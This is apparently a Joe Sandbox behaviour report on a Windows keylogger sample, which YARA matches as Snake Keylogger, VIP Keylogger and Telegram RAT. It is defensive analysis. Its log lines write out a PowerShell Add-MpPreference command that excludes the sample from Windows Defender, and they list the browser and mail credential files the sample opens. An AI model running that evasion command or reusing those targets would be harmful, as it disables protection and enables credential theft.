Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595280	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 595059	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594950	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Thread delayed: delay time: 594515	Jump to behavior

Source: 3GrfjMY0pG.exe, 00000005.00000002.3609453878.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll 18U
Source: svchost.exe, 00000006.00000002.2850534308.0000017E6D653000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.2850071346.0000017E6802B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`Sem~

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

Code function: 5_2_06C99548 LdrInitializeThunk,LdrInitializeThunk,

5_2_06C99548

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"			Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"			Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process created: C:\Users\user\Desktop\3GrfjMY0pG.exe "C:\Users\user\Desktop\3GrfjMY0pG.exe"			Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Users\user\Desktop\3GrfjMY0pG.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Users\user\Desktop\3GrfjMY0pG.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	11 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3GrfjMY0pG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
3GrfjMY0pG.exe